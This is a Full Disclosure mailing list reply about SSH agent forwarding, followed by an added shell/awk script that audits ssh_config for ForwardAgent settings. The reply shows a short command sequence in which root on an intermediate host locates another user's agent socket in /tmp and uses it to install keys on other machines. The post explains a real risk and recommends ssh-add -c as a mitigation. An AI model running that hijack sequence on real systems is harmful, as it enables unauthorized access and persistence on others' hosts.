Full Disclosure mailing list archives

Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding
From: Andrew McGill <andrew2005 () ledge co za>
Date: Fri, 24 Feb 2006 13:53:52 +0200 (SAST)

On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,

Hello all,

While trying to convince a customer that he really needs to get away
from password auth on his SSH servers, I ended up diving in to make
some detailed notes on how key agents and forwarding work. The outcome
of this was a new Tech Tip which explains it in some detail:

  Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding

I hope some find this helpful.


Here's something you missed in the "Cons" section of agent 

  lala@local:       ssh-add
  lala@local:         (enter key)
  lala@local:       ssh -A customer

    lala@customer:  ssh remote

      lala@remote:  sleep 86400

And while you are sleeping:
  root@customer does this:
        export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`
        ssh-copy-id lala@remote
        ssh-copy-id lala@local
        ssh-copy-id lala@othercustomer
        ssh-copy-id lala@lalaland

(Oops) (that's a lot easier than subverting ssh to insert 
something evil into the stream that will hack into the remote)

If there are untrusted machines involved you may prefer this:

  ssh-add -c

Note that ssh-agent does not identify the origin of requests for 
authentication (a bug?), so its confirmation is not fail-safe.


Leading Edge Business Solutions              +27 11 656 0360
Linux Training, Software and Networking  http://ledge.co.za/

Linux - load nothing else
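
Added example, not part of the original post: a client-side audit that lists which blocks of an ssh_config turn on agent forwarding, so forwarding to hosts you do not fully trust can be found and switched off. The function names and the sample config are constructed for illustration; only the host names come from the message above.

```sh
#!/bin/sh
# Added example: report ssh_config blocks that turn on agent forwarding.
# Reads a config on stdin, prints "<scope> <host patterns>" per enabling block.
audit_forward_agent() {
    awk '
    function report() {
        if (enabled) print scope " " patterns
        enabled = 0; seen = 0
    }
    # Options placed before the first Host line apply to every host.
    BEGIN { patterns = "*"; scope = "broad" }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        if (line == "" || line ~ /^#/) next
        # Keyword and argument are separated by whitespace and/or "=".
        key = line; sub(/[ \t=].*/, "", key); key = tolower(key)
        val = line; sub(/^[^ \t=]+[ \t]*=?[ \t]*/, "", val); sub(/[ \t]+$/, "", val)
        if (key == "host" || key == "match") {
            report()
            patterns = (key == "match") ? "Match " val : val
            scope = (key == "host" && val !~ /[*?]/) ? "explicit" : "broad"
        } else if (key == "forwardagent" && !seen) {
            # ssh uses the first value it obtains, so later repeats are ignored.
            # Anything other than "no" (yes, or an agent socket path) enables it.
            seen = 1
            enabled = (tolower(val) != "no")
        }
    }
    END { report() }
    '
}

# Constructed sample config; host names borrowed from the post above.
sample_config() {
cat <<'EOF'
Host customer
    ForwardAgent yes
Host remote
    ForwardAgent no
    ForwardAgent yes
Host *.example othercustomer
    forwardagent = yes
Host *
    ForwardAgent no
EOF
}

sample_config | audit_forward_agent
```

Run it against a real file with `audit_forward_agent < ~/.ssh/config`; a "broad" line means forwarding is enabled for a wildcard or Match block rather than one named host.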